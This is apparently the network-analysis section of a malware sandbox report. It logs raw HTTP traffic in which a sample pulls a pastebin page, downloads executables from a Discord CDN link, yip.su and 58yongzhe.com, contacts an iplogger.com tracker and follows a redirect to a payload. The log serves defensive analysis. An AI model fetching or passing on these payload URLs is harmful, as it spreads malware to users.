Network Analysis

GET /raw/E0rY26ni HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 05:11:22 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 730 Last-Modified: Sun, 18 Aug 2024 04:59:12 GMT Server: cloudflare CF-RAY: 8b4f671fcd0a29e6-FUK

GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Sun, 18 Aug 2024 05:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge cf-chl-out: s6M+4X7FkG3QckaDoqpDiwoJ3LTSYT4JdD8SXKK0RNbLL6LbSp0zFFqKieqDJLDo0bm34biCJbg4GnSHutZYwkPAcRwhZawrdnTqksYoGWU=$2iTjo7sRDzRpvNHXfwPNUQ== Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYfasVUS3aOmEKK87Vn7agXGGQjZIdGMBtsqFHQDOTTDTDwOm1yPL6xcnC%2FCH4x9BqdKih3vULnbNaDUXdcI2Iho50gvYlVijxQDLpYh04kqdiGLuWNa%2BbY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b4f6722bf0c52b9-LAX alt-svc: h3=":443"; ma=86400

GET /attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f& HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 05:11:23 GMT Content-Type: application/x-msdos-program Content-Length: 7620713 Connection: keep-alive CF-Ray: 8b4f6723bc14c107-ICN CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 3733 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="setup.exe" ETag: "43a4c130cb9c41aee2554d613e1f8be7" Expires: Mon, 18 Aug 2025 05:11:23 GMT Last-Modified: Sun, 18 Aug 2024 04:08:00 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1723954080615474 x-goog-hash: crc32c=tJdZDw== x-goog-hash: md5=Q6TBMMucQa7iVU1hPh+L5w== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7620713 x-guploader-uploadid: AHxI1nO2_BEbhH0G3g4PZk4KfJRVhkDgSeOBjWGXAFriuwWaK4BY5YCmDyyNlq5t1yWvr1t-Z0mt0YlBlA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=CS2Zx5wF35wO0EwyCNx9wELCJy8M6rccc2D_nVpqnPk-1723957883-1.0.1.1-1X8hsCyzE4ryAOfmP_3UWhYx7ycZNcnYSJ0QlXm223iUcEvf7x7QV4.blegXRELCJ2JZLxb0dE_5R4VxL28CBA; path=/; expires=Sun, 18-Aug-24 05:41:23 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1NbxUF6naEVic%2FVMCUYyp41V5l%2BkhjSKnVpPea5NC4i7zqCp3KilLuL0ijXHqoVQGLBBEgaQX3pz97ppPLkSB6h8OJOg0dpyjm%2BssblzmjRgVcFuTcvnRlfXBGb5E%2FHBkpCLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Set-Cookie: _cfuvid=a1beOUWUEwaMZ31uQSSXK25uqnUXOvXBUr9HjGeAX1g-1723957883524-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare

GET /1lyxz HTTP/1.1 Host: iplogger.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Sun, 18 Aug 2024 05:11:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge cf-chl-out: 0YCSjC8EKXtOCpB7dSgU2+rUYuJIBgI1uekChZhhMIJTXBw/+UiNiEYA0ALloAg7394NkH6TlaunQXWxk4G96avGrmS8HMZmfnZY7CijPOTyMOVN0u8D3dKQhKzNnxHWMQLNHXQe9sp+/NceCf787w==$nEGGbLujxwlwAHLxmEyjJg== Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTEEcl7j3QIMW9fHcOApWfj6F%2Fx3695AkyS4AMPXRTA9Iw8x9TwZjbb9%2B2xX8aUIFIjYIM9F%2B7nGoEedwqLrsKHvyl8liEEncA%2FyRDKIHnB9Ok%2FfPkg4bKAVSSO7JGU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b4f6762bef57ed5-LAX alt-svc: h3=":443"; ma=86400

GET /d/385104 HTTP/1.1 Host: 194.58.114.223 Connection: Keep-Alive

HTTP/1.1 302 Found Server: nginx Date: Sun, 18 Aug 2024 05:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1272578305203110022/1274580536710533180/setup.exe?ex=66c2c520&is=66c173a0&hm=d51a22ade8522653a2cc6588cb150f567c8f96756a3cdd3065c4669a4c08ed1f&

GET /parts/setup1.exe HTTP/1.1 Host: 58yongzhe.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 05:11:23 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 270336 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive